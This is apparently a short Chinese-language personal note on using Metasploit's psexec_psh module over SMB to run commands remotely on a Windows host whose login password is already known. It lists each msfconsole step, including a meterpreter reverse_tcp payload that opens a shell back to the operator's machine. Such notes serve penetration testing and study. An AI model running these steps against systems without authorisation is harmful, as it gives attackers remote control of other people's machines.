【笔记】MSF向Windows远程执行DOS命令
前言
在已知Windows登录口令的前提下,使用MSF通过smb协议,远程执行DOS命令
设置使用的模块
1 | msf > use exploit/windows/smb/psexec_psh |
设置payload
1 | msf > set payload windows/meterpreter/reverse_tcp |
设置远程的地址
<ip>:远程ip地址
1 | msf > set RHOSTS <ip> |
设置本机地址
<ip>:本机ip地址
1 | msf > set LHOST <ip> |
设置远程用户名
<username>:用户名
1 | msf > set SMBUSER <username> |
设置远程密码
<password>:密码,如果为空就留空
1 | msf > set SMBPASS <password> |
1 | msf > set SMBPASS |
漏洞利用
1 | msf > exploit |